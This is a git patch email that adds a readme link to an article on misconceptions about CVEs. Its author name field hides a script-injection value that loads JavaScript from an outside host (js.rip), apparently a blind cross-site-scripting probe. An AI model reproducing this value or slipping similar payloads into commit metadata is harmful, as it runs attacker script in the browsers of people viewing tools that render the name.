From 0f04192d0f1c22363ad590b8e0bf3cf56d91d4f5 Mon Sep 17 00:00:00 2001 From: "Jonathan Leitschuh\"script src=\"https://js.rip/b27oz0xw7e\"/script" Date: Mon, 14 Apr 2025 12:20:19 -0400 Subject: [PATCH] =?UTF-8?q?Add=20Falsehoods=20People=20Believe=20about=20C?= =?UTF-8?q?VE=E2=80=99s?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- readme.md | 1 + 1 file changed, 1 insertion(+) diff --git a/readme.md b/readme.md index 6ef8850..fca52ce 100644 --- a/readme.md +++ b/readme.md @@ -270,6 +270,7 @@ On character encoding, string formatting, unicode and internationalization. - [Falsehoods about REST APIs](https://web.archive.org/web/20201112010147/http://slinkp.com/falsehoods-programmers-believe-about-apis.html) - Pitfalls to be mindful of when creating and documenting APIs. - [URLs: It's complicated…](https://www.netmeister.org/blog/urls.html) - There's a lot of components in an URL, and all have their own logic. - [The Hidden Complexity of Downloading Favicons, Told in 15+ Edge Cases](https://web.archive.org/web/20230604033340/https://www.simplecto.com/complexity-downloading-favicons-told-in-15-plus-edge-cases/) - Downloading that little icon you see in you browser tabs should be a simple exercise. It turned out to be a lot more complicated than you think. Be vigilant that you are not shaving a Yak. +- [Falsehoods People Believe about CVE’s](https://medium.com/@jonathan.leitschuh/falsehoods-people-believe-about-cves-85c1d063ffda) - CVE ≠ Vulnerability (And 36 Other Confusions Regarding CVE) ## Contributing